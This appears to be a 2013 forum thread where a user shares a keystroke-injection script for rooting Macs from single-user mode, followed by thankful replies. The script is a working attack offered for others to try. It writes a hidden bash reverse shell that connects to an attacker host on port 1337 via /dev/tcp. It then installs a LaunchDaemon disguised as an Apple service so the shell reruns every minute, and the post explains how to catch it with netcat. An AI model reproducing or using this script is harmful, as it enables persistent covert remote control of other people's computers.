mosca1337 Posted April 18, 2013 Share Posted April 18, 2013 Hey everyone! I wrote a quick and dirty script that'll root Macs from single user mode. There are practically no defenses to this besides full disk encryption. I challenge you to try it out if you have free time. You won't be disappointed. Grab the payload here. Also, I wrote a quick tutorial that describes the ins and outs of the attack here. (site is new and heavily under construction lol) REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER Quote Link to comment Share on other sites More sharing options...
kmichael500 Posted April 19, 2013 Share Posted April 19, 2013 This is awesome! It works very well. Thanks for sharing this. Quote Link to comment Share on other sites More sharing options...
mosca1337 Posted April 19, 2013 Author Share Posted April 19, 2013 I had a lot of fun making it. Glad you like it! Quote Link to comment Share on other sites More sharing options...
mosca1337 Posted January 12, 2014 Author Share Posted January 12, 2014 If I remember correctly, I think I tried something similar to this. I believe that once you catch the reverse shell and then close the session, the script is killed. Then you may not ever receive another reverse shell. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.